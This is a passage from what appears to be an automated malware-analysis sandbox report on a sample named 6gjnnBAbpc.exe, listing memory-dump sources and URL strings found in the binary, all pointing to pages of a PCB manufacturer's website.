00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/services-capabilities/myro-intelligent-cloud-forehead-thermometer/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.438195929.000000000A1D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.329955461.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/services-capabilities/pcb-capabilities/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.438195929.000000000A1D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.329955461.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/services-capabilities/pcb-design-layout/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.438195929.000000000A1D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.329955461.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/services-capabilities/pcb-restoration/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.438195929.000000000A1D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.329955461.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/services-capabilities/pcba-services/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.438195929.000000000A1D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.329955461.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/services-capabilities/special-offer-specifications/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.438195929.000000000A1D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.329955461.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/services-capabilities/stencil/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.438195929.000000000A1D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.329955461.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/testimonial/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.438195929.000000000A1D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.329955461.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/why-use-myro/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.438195929.000000000A1D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.329955461.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/why-use-myro/about-us/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.438195929.000000000A1D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.329955461.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/why-use-myro/agents-brokers/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.438195929.000000000A1D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.329955461.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/why-use-myro/awards-certificates/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.438195929.000000000A1D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.329955461.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: 